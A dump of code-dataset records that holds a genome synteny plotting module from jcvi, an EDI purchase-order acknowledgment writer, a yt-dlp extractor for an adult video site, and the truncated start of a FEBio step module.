jcvi.utils.cbook import human_size\nfrom jcvi.utils.validator import validate_in_choices, validate_in_range\nfrom jcvi.apps.base import OptionParser\n\nfrom jcvi.graphics.glyph import (\n BasePalette,\n Glyph,\n OrientationPalette,\n OrthoGroupPalette,\n RoundLabel,\n)\nfrom jcvi.graphics.base import (\n markup,\n mpl,\n plt,\n savefig,\n Path,\n PathPatch,\n AbstractLayout,\n)\n\n\nHorizontalAlignments = (\"left\", \"right\", \"leftalign\", \"rightalign\", \"center\", \"\")\nVerticalAlignments = (\"top\", \"bottom\", \"center\", \"\")\nCanvasSize = 0.65\n\n\nclass LayoutLine(object):\n def __init__(self, row, delimiter=\",\"):\n self.hidden = row[0] == \"*\"\n if self.hidden:\n row = row[1:]\n args = row.rstrip().split(delimiter)\n args = [x.strip() for x in args]\n self.x = float(args[0])\n validate_in_range(self.x, 0, 1, \"XPosition(x) column\")\n self.y = float(args[1])\n validate_in_range(self.y, 0, 1, \"YPosition(y) column\")\n self.rotation = int(args[2])\n self.ha = args[3]\n validate_in_choices(\n self.ha, HorizontalAlignments, \"HorizontaAlignment(ha) column\"\n )\n self.va = args[4]\n validate_in_choices(self.va, VerticalAlignments, \"VerticalAlignment(va) column\")\n self.color = args[5]\n self.ratio = 1\n if len(args) > 6:\n self.ratio = float(args[6])\n if len(args) > 7:\n self.label = args[7].strip()\n else:\n self.label = None\n\n\nclass Layout(AbstractLayout):\n def __init__(self, filename, delimiter=\",\", seed: Optional[int] = None):\n super(Layout, self).__init__(filename)\n fp = open(filename)\n self.edges = []\n for row in fp:\n if row[0] == \"#\":\n continue\n if row[0] == \"e\":\n args = row.rstrip().split(delimiter)\n args = [x.strip() for x in args]\n a, b = args[1:3]\n if len(args) >= 4 and args[3]:\n blockcolor = args[3]\n else:\n blockcolor = None\n if len(args) >= 5 and args[4]:\n samearc = args[4]\n else:\n samearc = None\n a, b = int(a), int(b)\n assert args[0] == \"e\"\n self.edges.append((a, b, blockcolor, samearc))\n else:\n self.append(LayoutLine(row, delimiter=delimiter))\n\n self.assign_colors(seed=seed)\n\n\nclass Shade(object):\n Styles = (\"curve\", \"line\")\n\n def __init__(\n self,\n ax,\n a,\n b,\n ymid_pad: float = 0.0,\n highlight=False,\n style=\"curve\",\n ec=\"k\",\n fc=\"k\",\n alpha=0.2,\n lw=1,\n zorder=1,\n ):\n \"\"\"Create syntenic wedges between tracks.\n\n Args:\n ax: matplotlib Axes\n a (tuple of floats): ((start_x, start_y), (end_x, end_y))\n b (tuple of floats): ((start_x, start_y), (end_x, end_y))\n ymid_pad (float): Adjustment to y-mid position of Bezier controls, curve style only\n highlight (bool, optional): Plot this shade if color is specified. Defaults to False.\n style (str, optional): Style. Defaults to \"curve\", must be one of\n (\"curve\", \"line\")\n ec (str, optional): Edge color. Defaults to \"k\".\n fc (str, optional): Face color. Defaults to \"k\".\n alpha (float, optional): Transparency. Defaults to 0.2.\n lw (int, optional): Line width. Defaults to 1.\n zorder (int, optional): Z-order. Defaults to 1.\n \"\"\"\n fc = fc or \"gainsboro\" # Default block color is grayish\n assert style in self.Styles, \"style must be one of {}\".format(self.Styles)\n a1, a2 = a\n b1, b2 = b\n ax1, ay1 = a1\n ax2, ay2 = a2\n bx1, by1 = b1\n bx2, by2 = b2\n if ax1 is None or ax2 is None or bx1 is None or bx2 is None:\n logging.warning(\"Shade: None found in coordinates, skipping\")\n return\n M, C4, L, CP = Path.MOVETO, Path.CURVE4, Path.LINETO, Path.CLOSEPOLY\n if style == \"curve\":\n ymid1 = (ay1 + by1) / 2 + ymid_pad\n ymid2 = (ay2 + by2) / 2 + ymid_pad\n pathdata = [\n (M, a1),\n (C4, (ax1, ymid1)),\n (C4, (bx1, ymid1)),\n (C4, b1),\n (L, b2),\n (C4, (bx2, ymid2)),\n (C4, (ax2, ymid2)),\n (C4, a2),\n (CP, a1),\n ]\n else:\n pathdata = [(M, a1), (L, b1), (L, b2), (L, a2), (CP, a1)]\n codes, verts = zip(*pathdata)\n path = Path(verts, codes)\n if highlight:\n ec = fc = highlight\n\n pp = PathPatch(path, ec=ec, fc=fc, alpha=alpha, lw=lw, zorder=zorder)\n ax.add_patch(pp)\n\n\nclass Region(object):\n def __init__(\n self,\n ax,\n ext,\n layout,\n bed,\n scale,\n switch=None,\n chr_label=True,\n loc_label=True,\n gene_labels: Optional[set] = None,\n genelabelsize=0,\n pad=0.05,\n vpad=0.015,\n extra_features=None,\n glyphstyle=\"box\",\n glyphcolor: BasePalette = OrientationPalette(),\n ):\n x, y = layout.x, layout.y\n ratio = layout.ratio\n scale /= ratio\n self.y = y\n lr = layout.rotation\n tr = mpl.transforms.Affine2D().rotate_deg_around(x, y, lr) + ax.transAxes\n inv = ax.transAxes.inverted()\n\n start, end, si, ei, chr, orientation, span = ext\n flank = span / scale / 2\n xstart, xend = x - flank, x + flank\n self.xstart, self.xend = xstart, xend\n\n cv = lambda t: xstart + abs(t - startbp) / scale\n hidden = layout.hidden\n\n # Chromosome\n if not hidden:\n ax.plot((xstart, xend), (y, y), color=\"gray\", transform=tr, lw=2, zorder=1)\n\n self.genes = genes = bed[si : ei + 1]\n startbp, endbp = start.start, end.end\n if orientation == \"-\":\n startbp, endbp = endbp, startbp\n\n if switch:\n chr = switch.get(chr, chr)\n if layout.label:\n chr = layout.label\n\n label = \"-\".join(\n (\n human_size(startbp, target=\"Mb\", precision=2)[:-2],\n human_size(endbp, target=\"Mb\", precision=2),\n )\n )\n\n height = 0.012\n self.gg = {}\n # Genes\n for g in genes:\n gstart, gend = g.start, g.end\n strand = g.strand\n if strand == \"-\":\n gstart, gend = gend, gstart\n if orientation == \"-\":\n strand = \"+\" if strand == \"-\" else \"-\"\n\n x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)\n gene_name = g.accn\n self.gg[gene_name] = (a, b)\n\n color, zorder = (\n glyphcolor.get_color_and_zorder(strand)\n if isinstance(glyphcolor, OrientationPalette)\n else glyphcolor.get_color_and_zorder(gene_name)\n )\n\n if hidden:\n continue\n gp = Glyph(\n ax,\n x1,\n x2,\n y,\n height,\n gradient=False,\n fc=color,\n style=glyphstyle,\n zorder=zorder,\n )\n gp.set_transform(tr)\n if genelabelsize and (not gene_labels or gene_name in gene_labels):\n ax.text(\n (x1 + x2) / 2,\n y + height / 2 + genelabelsize * vpad / 3,\n markup(gene_name),\n size=genelabelsize,\n rotation=25,\n ha=\"left\",\n va=\"center\",\n color=\"lightslategray\",\n )\n\n # Extra features (like repeats)\n if extra_features:\n for g in extra_features:\n gstart, gend = g.start, g.end\n x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)\n gp = Glyph(\n ax,\n x1,\n x2,\n y,\n height * 3 / 4,\n gradient=False,\n fc=\"#ff7f00\",\n style=glyphstyle,\n zorder=2,\n )\n gp.set_transform(tr)\n\n ha, va = layout.ha, layout.va\n\n hpad = 0.02\n if ha == \"left\":\n xx = xstart - hpad\n ha = \"right\"\n elif ha == \"leftalign\":\n xx = 0.5 - CanvasSize / 2 - hpad\n ha = \"right\"\n elif ha == \"right\":\n xx = xend + hpad\n ha = \"left\"\n elif ha == \"rightalign\":\n xx = 0.5 + CanvasSize / 2 + hpad\n ha = \"left\"\n else:\n xx = x\n ha = \"center\"\n\n # Tentative solution to labels stick into glyph\n magic = 40.0\n cc = abs(lr) / magic if abs(lr) > magic else 1\n if va == \"top\":\n yy = y + cc * pad\n elif va == \"bottom\":\n yy = y - cc * pad\n else:\n yy = y\n\n l = np.array((xx, yy))\n trans_angle = ax.transAxes.transform_angles(np.array((lr,)), l.reshape((1, 2)))[\n 0\n ]\n lx, ly = l\n if not hidden:\n bbox = dict(boxstyle=\"round\", fc=\"w\", ec=\"w\", alpha=0.5)\n kwargs = dict(\n ha=ha, va=\"center\", rotation=trans_angle, bbox=bbox, zorder=10\n )\n\n # TODO: I spent several hours on trying to make this work - with no\n # good solutions. To generate labels on multiple lines, each line\n # with a different style is difficult in matplotlib. The only way,\n # if you can tolerate an extra dot (.), is to use the recipe below.\n # chr_label = r\"\\noindent \" + markup(chr) + r\" \\\\ .\" if chr_label else None\n # loc_label = r\"\\noindent . \\\\ \" + label if loc_label else None\n\n chr_label = markup(chr) if chr_label else None\n loc_label = label if loc_label else None\n if chr_label:\n if loc_label:\n ax.text(lx, ly + vpad, chr_label, color=layout.color, **kwargs)\n ax.text(\n lx,\n ly - vpad,\n loc_label,\n color=\"lightslategrey\",\n size=10,\n **kwargs,\n )\n else:\n ax.text(lx, ly, chr_label, color=layout.color, **kwargs)\n\n def get_coordinates(self, gstart, gend, y, cv, tr, inv):\n x1, x2 = cv(gstart), cv(gend)\n a, b = tr.transform((x1, y)), tr.transform((x2, y))\n a, b = inv.transform(a), inv.transform(b)\n return x1, x2, a, b\n\n\ndef ymid_offset(samearc: Optional[str], pad: float = 0.05):\n \"\"\"\n Adjustment to ymid, this is useful to adjust the appearance of the Bezier\n curves between the tracks.\n \"\"\"\n if samearc == \"above\":\n return 2 * pad\n if samearc == \"above2\":\n return 4 * pad\n if samearc == \"below\":\n return -2 * pad\n if samearc == \"below2\":\n return -4 * pad\n return 0\n\n\nclass Synteny(object):\n def __init__(\n self,\n fig,\n root,\n datafile,\n bedfile,\n layoutfile,\n switch=None,\n tree=None,\n extra_features=None,\n chr_label=True,\n loc_label=True,\n gene_labels: Optional[set] = None,\n genelabelsize=0,\n pad=0.05,\n vpad=0.015,\n scalebar=False,\n shadestyle=\"curve\",\n glyphstyle=\"arrow\",\n glyphcolor: BasePalette = OrientationPalette(),\n seed: Optional[int] = None,\n ):\n _, h = fig.get_figwidth(), fig.get_figheight()\n bed = Bed(bedfile)\n order = bed.order\n bf = BlockFile(datafile)\n self.layout = lo = Layout(layoutfile, seed=seed)\n switch = DictFile(switch, delimiter=\"\\t\") if switch else None\n if extra_features:\n extra_features = Bed(extra_features)\n\n exts = []\n extras = []\n for i in range(bf.ncols):\n ext = bf.get_extent(i, order)\n exts.append(ext)\n if extra_features:\n start, end, si, ei, chr, orientation, span = ext\n start, end = start.start, end.end # start, end coordinates\n ef = list(extra_features.extract(chr, start, end))\n\n # Pruning removes minor features with < 0.1% of the region\n ef_pruned = [x for x in ef if x.span >= span / 1000]\n print(\n \"Extracted {0} features \"\n \"({1} after pruning)\".format(len(ef), len(ef_pruned)),\n file=sys.stderr,\n )\n extras.append(ef_pruned)\n\n maxspan = max(exts, key=lambda x: x[-1])[-1]\n scale = maxspan / CanvasSize\n\n self.gg = gg = {}\n self.rr = []\n ymids = []\n glyphcolor = (\n OrientationPalette()\n if glyphcolor == \"orientation\"\n else OrthoGroupPalette(bf.grouper())\n )\n for i in range(bf.ncols):\n ext = exts[i]\n ef = extras[i] if extras else None\n r = Region(\n root,\n ext,\n lo[i],\n bed,\n scale,\n switch,\n gene_labels=gene_labels,\n genelabelsize=genelabelsize,\n chr_label=chr_label,\n loc_label=loc_label,\n vpad=vpad,\n extra_features=ef,\n glyphstyle=glyphstyle,\n glyphcolor=glyphcolor,\n )\n self.rr.append(r)\n # Use tid and accn to store gene positions\n gg.update(dict(((i, k), v) for k, v in r.gg.items()))\n ymids.append(r.y)\n\n for i, j, blockcolor, samearc in lo.edges:\n ymid_pad = ymid_offset(samearc, pad)\n for ga, gb, h in bf.iter_pairs(i, j):\n a, b = gg[(i, ga)], gg[(j, gb)]\n Shade(\n root, a, b, ymid_pad, fc=blockcolor, lw=0, alpha=1, style=shadestyle\n )\n\n for ga, gb, h in bf.iter_pairs(i, j, highlight=True):\n a, b = gg[(i, ga)], gg[(j, gb)]\n Shade(\n root,\n a,\n b,\n ymid_pad,\n alpha=1,\n highlight=h,\n zorder=2,\n style=shadestyle,\n )\n\n if scalebar:\n print(\"Build scalebar (scale={})\".format(scale), file=sys.stderr)\n # Find the best length of the scalebar\n ar = [1, 2, 5]\n candidates = (\n [1000 * x for x in ar]\n + [10000 * x for x in ar]\n + [100000 * x for x in ar]\n )\n # Find the one that's close to an optimal canvas size\n dists = [(abs(x / scale - 0.12), x) for x in candidates]\n dist, candidate = min(dists)\n dist = candidate / scale\n x, y, yp = 0.22, 0.92, 0.005\n a, b = x - dist / 2, x + dist / 2\n lsg = \"lightslategrey\"\n root.plot([a, a], [y - yp, y + yp], \"-\", lw=2, color=lsg)\n root.plot([b, b], [y - yp, y + yp], \"-\", lw=2, color=lsg)\n root.plot([a, b], [y, y], \"-\", lw=2, color=lsg)\n root.text(\n x,\n y + 0.02,\n human_size(candidate, precision=0),\n ha=\"center\",\n va=\"center\",\n )\n\n if tree:\n from jcvi.graphics.tree import draw_tree, read_trees\n\n trees = read_trees(tree)\n ntrees = len(trees)\n logging.debug(\"A total of {0} trees imported.\".format(ntrees))\n xiv = 1.0 / ntrees\n yiv = 0.3\n xstart = 0\n ystart = min(ymids) - 0.4\n for i in range(ntrees):\n ax = fig.add_axes([xstart, ystart, xiv, yiv])\n label, outgroup, color, tx = trees[i]\n draw_tree(\n ax,\n tx,\n outgroup=outgroup,\n rmargin=0.4,\n leaffont=11,\n treecolor=color,\n supportcolor=color,\n leafcolor=color,\n )\n xstart += xiv\n RoundLabel(ax, 0.5, 0.3, label, fill=True, fc=\"lavender\", color=color)\n\n\ndef draw_gene_legend(\n ax,\n x1,\n x2,\n ytop,\n d=0.04,\n text=False,\n repeat=False,\n glyphstyle=\"box\",\n):\n forward, backward = OrientationPalette.forward, OrientationPalette.backward\n ax.plot([x1, x1 + d], [ytop, ytop], \":\", color=forward, lw=2)\n ax.plot([x1 + d], [ytop], \">\", color=forward, mec=forward)\n ax.plot([x2, x2 + d], [ytop, ytop], \":\", color=backward, lw=2)\n ax.plot([x2], [ytop], \"<\", color=backward, mec=\"g\")\n if text:\n ax.text(x1 + d / 2, ytop + d / 2, \"gene (+)\", ha=\"center\")\n ax.text(x2 + d / 2, ytop + d / 2, \"gene (-)\", ha=\"center\")\n if repeat:\n xr = (x1 + x2 + d) / 2\n Glyph(\n ax,\n xr - d / 2,\n xr + d / 2,\n ytop,\n 0.012 * 3 / 4,\n gradient=False,\n fc=\"#ff7f00\",\n style=glyphstyle,\n zorder=2,\n )\n ax.text(xr, ytop + d / 2, \"repeat\", ha=\"center\")\n\n\ndef main():\n p = OptionParser(__doc__)\n p.add_option(\"--switch\", help=\"Rename the seqid with two-column file\")\n p.add_option(\"--tree\", help=\"Display trees on the bottom of the figure\")\n p.add_option(\"--extra\", help=\"Extra features in BED format\")\n p.add_option(\n \"--genelabels\",\n help='Show only these gene labels, separated by comma. Example: \"At1g12340,At5g54690\"',\n )\n p.add_option(\n \"--genelabelsize\",\n default=0,\n type=\"int\",\n help=\"Show gene labels at this font size, useful for debugging. \"\n + \"However, plot may appear visually crowded. \"\n + \"Reasonably good values are 2 to 6 [Default: disabled]\",\n )\n p.add_option(\n \"--scalebar\",\n default=False,\n action=\"store_true\",\n help=\"Add scale bar to the plot\",\n )\n p.add_option(\n \"--glyphstyle\",\n default=\"box\",\n choices=Glyph.Styles,\n help=\"Style of feature glyphs\",\n )\n p.add_option(\n \"--glyphcolor\",\n default=\"orientation\",\n choices=Glyph.Palette,\n help=\"Glyph coloring based on\",\n )\n p.add_option(\n \"--shadestyle\",\n default=\"curve\",\n choices=Shade.Styles,\n help=\"Style of syntenic wedges\",\n )\n opts, args, iopts = p.set_image_options(figsize=\"8x7\")\n\n if len(args) != 3:\n sys.exit(not p.print_help())\n\n datafile, bedfile, layoutfile = args\n switch = opts.switch\n tree = opts.tree\n gene_labels = None if not opts.genelabels else set(opts.genelabels.split(\",\"))\n\n pf = datafile.rsplit(\".\", 1)[0]\n fig = plt.figure(1, (iopts.w, iopts.h))\n root = fig.add_axes([0, 0, 1, 1])\n Synteny(\n fig,\n root,\n datafile,\n bedfile,\n layoutfile,\n switch=switch,\n tree=tree,\n extra_features=opts.extra,\n gene_labels=gene_labels,\n genelabelsize=opts.genelabelsize,\n scalebar=opts.scalebar,\n shadestyle=opts.shadestyle,\n glyphstyle=opts.glyphstyle,\n glyphcolor=opts.glyphcolor,\n seed=iopts.seed,\n )\n\n root.set_xlim(0, 1)\n root.set_ylim(0, 1)\n root.set_axis_off()\n\n image_name = pf + \".\" + iopts.format\n savefig(image_name, dpi=iopts.dpi, iopts=iopts)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tanghaibao/jcvi","sub_path":"jcvi/graphics/synteny.py","file_name":"synteny.py","file_ext":"py","file_size_in_byte":20888,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"42489049632","text":"import os\nimport datetime\nfrom typing import List, Dict, Union\nfrom pandas.tseries.offsets import BDay\nfrom .sftp import SFTP\n\n\"\"\"\n 855 APK paylaod \n\n ISA:Authorization Information Qualifier, \n Authorization Information,\n Security Information Qualifier, \n Security Information.\n Interchange ID Qualifier, \n Interchange Sender ID,\n Interchange ID Qualifier, \n Interchange Receiver ID,\n Interchange Date, \n Interchange Time,\n Interchange Control Standards Identifier, \n Interchange Control Version Number,\n Interchange Control Number, \n Acknowledgment Requested,\n Usage Indicator,\n Component Element Separator,\n\n GS: Functional Identifier Code\n Application Sender's Code\n Application Receiver's Code\n Date\n Time\n Group Control Number\n Responsible Agency Code\n Version / Release / Industry Identifier Code\n \n ST: Transaction Set Identifier Code\n Transaction Set Control Number\n\n BAK:Transaction Set Purpose Code (\n 06: Confirmation\n )\n Acknowledgment Type (\n AC: Acknowledge - With Detail and Change\n AD: Acknowledge - With Detail, No Change\n AE: Acknowledge - With Exception Detail Only\n AT: Accepted\n RD: Reject with Detail\n )\n Purchase Order Number\n Date (YYYYMMDD)\n Release Number\n Reference Identification\n Date (YYYYMMDD)\n\n BSN:Transaction Set Purpose Code (\n 00: Original, \n 14: Advance Notification\n )\n Shipment Identification\n Date\n Time\n Hierarchical Structure Code (\n 0004 : Shipment, Order, Item\n )\n\n DTM:Date/Time Qualifier (\n 002 Delivery Requested\n 010 Requested Ship\n 017 Estimated Delivery\n 069 Promised for Delivery\n )\n Date (YYYYMMDD)\n\n ---- LOOP Loop Hierarchical Level ----\n HL: Hierarchical Level (\n Hierarchical ID Number,\n Hierarchical Parent ID Number,\n Hierarchical Level Code\n )\n REF:Reference Identification (\n Reference Identification Qualifier (\n BM: Bill of Lading Number\n CN: Carrier's Reference Number (PRO/Invoice)\n MB: Master Bill of Lading\n PK: Packing List Number\n ZZ: Mutually Defined\n )\n )\n PER:Administrative Communications Contact\n DTM:Date/Time Reference\n\n ---- LOOP Loop Reference Identification ----\n N9: Reference Identification Qualifier\n Reference Identification\n\n MSG:Free-Form Message Text\n\n ---- LOOP Addresses ----\n N1: Name (\n Entity Identifier Code (\n BT: Bill-to-Party\n ST: Ship To\n VN: Vendor\n )\n Identification Code Qualifier (\n 91: Assigned by Seller or Seller's Agent\n 92: Assigned by Buyer or Buyer's Agent\n ZZ: Mutually Defined\n )\n Identification Code\n )\n\n N2: Additional Name Information (\n Name\n Name\n )\n\n N3: Address Information (\n Address Information\n Address Information\n )\n\n N4: Geographic Location (\n City Name\n State or Province Code\n Postal Code\n Country Code\n )\n\n ---- LOOP ITEMS ----\n PO1:Assigned Identification\n Quantity Ordered\n Unit or Basis for Measurement Code (CA: Case, EA: Each)\n Unit Price\n Product/Service ID Qualifier (\n VC: Vendor's (Seller's) Catalog Number\n VN: Vendor's (Seller's) Item Number\n )\n Product/Service ID\n \n PID:Item Description Type (F: Free-form)\n Description\n \n ACK:Line Item Status Code (\n AC: Item Accepted and Shipped\n AR: Item Accepted and Released for Shipment\n BP: Item Accepted - Partial Shipment, Balance Backordered\n IA: Item Accepted\n IB: Item Backordered\n IC: Item Accepted - Changes Made\n ID: Item Deleted\n IF: Item on Hold, Incomplete Description\n IP: Item Accepted - Price Changed\n IQ: Item Accepted - Quantity Changed\n IR: Item Rejected\n IS: Item Accepted - Substitution Made\n R1: Item Rejected, Not a Contract Item\n R2: Item Rejected, Invalid Item Product Number\n R3: Item Rejected, Invalid Unit of Issue\n R4: Item Rejected, Contract Item not Available\n )\n Quantity\n Unit or Basis for Measurement Code (\n CA: Case\n EA: Each\n )\n Date/Time Qualifier (\n 017 Estimated Delivery\n 068 Current Schedule Ship\n )\n Date (YYYYMMDD)\n Product/Service ID Qualifier (\n VC: Vendor's (Seller's) Catalog Number\n VN: Vendor's (Seller's) Item Number\n )\n Product/Service ID\n\n CTT:Number of Line Items\n \n SE: Number of Included Segments, \n Transaction Set Control Number\n \n GE: Number of Transaction Sets Included, \n Group Control Number\n\n IEA:Number of Included Functional Groups, \n Interchange Control Number\n\n\"\"\"\nclass Writer(SFTP):\n\n def __init__(self, reader=None, sap=None) -> None:\n super().__init__()\n self.reader = reader\n self.sap = sap\n self.now = datetime.datetime.now()\n self.date = self.now.strftime('%y%m%d')\n self.fulldate = self.now.strftime('%Y%m%d')\n self.time = self.now.strftime('%H%M')\n\n self.document_type = ''\n\n self.document_header = {}\n self.document_lines = []\n self.document_footer = {}\n\n self.doyon = 'DOYONSDESPRES '\n self.receiver_id = ''\n\n self.interchange_id_qualifier = 'ZZ'\n self.interchange_ctrl_version = '00401'\n self.interchange_ctrl_number = '000000001'\n self.group_control = \"00001\"\n self.transaction_ctrl_number = '000000001'\n\n self.id_code_qualifier = '91'\n\n self.order_document = self.reader.get_document()\n self.order_lines = self.reader.get_lines()\n self.receiver_id = self.reader.header[0][6]\n self.ship_to = self.reader.get_ship_to()\n self.bill_to = self.reader.get_bill_to()\n self.related_po = self.order_document['reference']\n self.ref_order = self.order_document['po_ref']\n \n self.functional_id = 'PR'\n self.date_time_id = '011'\n\n if hasattr(self.reader, \"filename\"):\n self.filename = self.reader.filename\n \n def get_ISA(self) -> List:\n return [\n 'ISA', \n '00', # Authorization Information Qualifier\n ' ', # Authorization Information\n '00', # Security Information Qualifier\n ' ', # Security Information\n f'{self.interchange_id_qualifier}', # Interchange ID Qualifier\n f'{self.doyon}'.ljust(15), # Interchange Sender ID\n f'{self.interchange_id_qualifier}', # Interchange ID Qualifier\n f'{self.receiver_id}'.ljust(15), # Interchange Receiver ID\n f'{self.date}', # Interchange Date\n f'{self.time}', # Interchange Time\n 'U', # Interchange Control Standards Identifier\n f'{self.interchange_ctrl_version}', # Interchange Control Version Number\n f'{self.interchange_ctrl_number}', # Interchange Control Number\n '0', # Acknowledgment Requested\n 'P', # Usage Indicator\n '|' # Component Element Separator\n ]\n\n def get_GS(self) -> List:\n return [\n \"GS\",\n f\"{self.functional_id}\", # Functional Identifier Code\n f'{self.doyon}', # Application Sender's Code\n f'{self.receiver_id}'.strip(' '), # Application Receiver's Code\n f'{self.fulldate}', # Date\n f'{self.time}', # Time\n f\"{self.group_control}\".strip(\"0\"), # Group Control Number\n \"X\", # Responsible Agency Code\n f'{self.interchange_ctrl_version}0', # Version / Release / Industry Identifier Code\n ]\n\n def get_ST(self) -> List:\n return [\n \"ST\",\n f\"{self.document_type}\", # Transaction Set Identifier Code\n f\"{self.transaction_ctrl_number[-4:]}\" # Transaction Set Control Number\n ]\n\n def get_BIG(self) -> List:\n return [\n \"BIG\",\n f\"{self.sap['doc']['DocDate'].strftime('%Y%m%d')}\",\n f\"{self.sap['doc']['DocNum']}\",\n f\"{self.fulldate}\",\n f\"{self.sap['doc']['NumAtCard']}\",\n '', '',\n \"DI\",\n ]\n \n def get_CUR(self) -> List:\n return [\"CUR\", \"SE\", \"CAD\"]\n\n def get_REF(self) -> List:\n document = self.reader.get_document()\n return [\n \"REF\",\n \"PK\",\n f\"{self.sap['doc']['DocNum']}\",\n ]\n\n def get_PER(self) -> List:\n return [\n \"PER\",\n \"DI\",\n f\"{self.sap['doc']['SlpName']}\",\n f\"EM\",\n f\"{self.sap['doc']['SlpEmail']}\",\n ]\n \n def get_BSN(self) -> List:\n return [\n \"BSN\",\n \"00\", # Transction Set Purpose Code (00 - Original, 14 - Advance Notification)\n f\"{self.sap['doc']['DocNum']}\", # Shipment Identification\n f\"{self.fulldate}\", # Date YYYYMMDD\n f\"{self.time}\", # Time HHMM\n \"0004\", # Hierarchical Structure Code\n ]\n\n def get_HL(self) -> List:\n return [\"HL\",\"1\",\"\",\"S\"]\n\n def get_BAK(self) -> List:\n return [\n \"BAK\",\n \"06\", # Transaction Set Purpose Code\n \"AC\", # Acknowledgment Type\n f\"{self.sap['doc']['NumAtCard']}\", # Purchase Order Number\n f'{self.order_document[\"date\"]}', # Date / is the date assigned by the purchaser to purchase order\n #\"\", # Release Number\n #f\"{self.ref_order[:-3]}\", # Reference Identification\n #f'{self.fulldate}', # Date\n ]\n\n def get_DTM(self) -> List:\n return [\n \"DTM\",\n f\"{self.date_time_id}\", # Date/Time Qualifier\n f'{self.fulldate}', # Date\n ]\n\n def get_N_loop(self) -> Dict:\n return {\n 'N1_ST': [\n 'N1',\n 'ST', # Entity Identifier Code\n f'{self.ship_to[\"name\"][:59]}', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n f'{self.ship_to[\"code\"]}', # Identification Code\n ],\n 'N1_BT': [\n 'N1',\n 'BT', # Entity Identifier Code\n f'{self.bill_to[\"name\"][:59]}', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n f'{self.bill_to[\"code\"]}', # Identification Code\n ],\n 'N1_VN': [\n 'N1', \n 'VN', # Entity Identifier Code\n 'DOYONDESPRES', # Name\n f\"{self.id_code_qualifier}\", # Identification Code Qualifier\n 'DOYONDESPRES', # Identification Code\n ]\n }\n \n def get_ITD(self) -> List:\n return [\n 'ITD',\n '01',\n '3',\n '',\n f\"{self.sap['doc']['DocDueDate'].strftime('%Y%m%d')}\",\n ]\n \n def get_CTT(self) -> List:\n return ['CTT', f'{len(self.document_lines)}']\n\n def get_SE(self) -> List:\n str_count = len([x for x in self.document_header if x not in ['ISA', 'GS']])\n for line in self.document_lines:\n str_count += len(line)\n str_count += 2\n return ['SE', f'{str_count}', f'{self.transaction_ctrl_number[-4:]}']\n\n def get_GE(self) -> List:\n return ['GE', f\"{self.group_control}\".strip(\"0\"), f\"{self.group_control}\".strip(\"0\")]\n\n def get_IEA(self) -> List:\n return ['IEA', '1', f'{self.interchange_ctrl_number}']\n\n # Overrided function\n def build_header(self) -> None:\n pass\n\n # Overrided function\n def build_lines(self):\n pass\n\n # Overrided function\n def build_footer(self) -> None:\n self.document_footer = {\n 'CTT': self.get_CTT(),\n 'SE': self.get_SE(),\n 'GE': self.get_GE(),\n 'IEA': self.get_IEA()\n }\n\n def create(self, transfert=False):\n self.build_header()\n self.build_lines()\n self.build_footer()\n\n _rtn = []\n for prop in [self.document_header, *self.document_lines, self.document_footer]:\n for key, val in prop.items():\n _rtn.append(\"*\".join(val))\n str_return = \"~\\n\".join(_rtn)\n if str_return[-1] != \"~\":\n str_return += \"~\"\n \n path = f\"{self.local_upload_path}/{self.filename}-{self.document_type}-{self.sap['doc']['DocNum']}\"\n try:\n os.remove(path)\n except:\n pass\n file = open(path, 'a', encoding=\"ISO-8859-1\")\n file.write(str_return)\n file.close()\n if transfert:\n send_report = self.upload_files()\n else:\n send_report = None\n\n return str_return, send_report\n\n def get_document(self) -> List:\n _rtn = []\n for prop in [self.document_header, *self.document_lines, self.document_footer]:\n for key, val in prop.items():\n _rtn.append(val)\n return _rtn\n\n def get_order_line_by_item_code(self, item_code) -> dict:\n order_line = None\n order_line = list(filter(lambda x: (x['code'] == item_code), self.order_lines))\n if order_line:\n return order_line[0]\n raise Exception('Order Line not found')\n\n ","repo_name":"pygauthier/code_exemple","sub_path":"edi/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":14124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33057966256","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..utils import (\n ExtractorError,\n)\n\n\nclass EynyBaseIE(InfoExtractor):\n IE_DESC = False # Do not list\n\n\nclass EynyIE(EynyBaseIE):\n IE_NAME = 'eyny'\n _VALID_URL = r'https?:\\/\\/(?:www\\.)?eyny\\.com\\/\\d+\\/watch\\?v=(?P[^#?&]+)(?:&[^&]+)*'\n _TEST = {}\n _TITLE_REGEX = re.compile(r'(?ms)(.+) - Free Videos \\& Sex Movies - XXX Tube - EYNY<\\/title>')\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(url, video_id)\n\n title = self._TITLE_REGEX.search(webpage).group(1)\n\n entries = self._parse_html5_media_entries(url, webpage, video_id, m3u8_id='hls')\n if not entries:\n raise ExtractorError('Private video', expected=True)\n entry = entries[0]\n self._sort_formats(entry['formats'])\n entry.update({\n 'id': video_id,\n 'title': title,\n 'age_limit': 18,\n })\n return entry\n","repo_name":"ytdl-patched/ytdl-patched","sub_path":"yt_dlp/extractor/eyny.py","file_name":"eyny.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":429,"dataset":"github-code","pt":"78"} +{"seq_id":"39045898118","text":"# -*- coding:utf-8 -*-\n# @Time: 7/5/22 2:14 μ.μ.\n# @Author: kostas\n# @Email: krisvas@ece.upatras.gr\n# @Filename: step.py\nimport copy\nimport xml.etree.ElementTree as ET\n\n__doc__ = \"Step submodule to add control steps.\"\n__all__ = [\"Step\"]\n\n\nclass Step:\n\t\"\"\"\n\t \"Build an instance of object Control\n\t\"\"\"\n\n\tdef __init__(self, model):\n\t\t\"\"\"\n\t\tConstructor\n\n\t\tParameters\n\t\t----------\n\t\tmodel: an initialized febio_exporter model\n\t\t\"\"\"\n\t\tself.parent = model\n\t\tself.step_counter = 1\n\t\tself.step = None\n\t\tself.root = None\n\t\tself.control = None\n\t\tself.loadcurve_id = None\n\t\tself.initial = 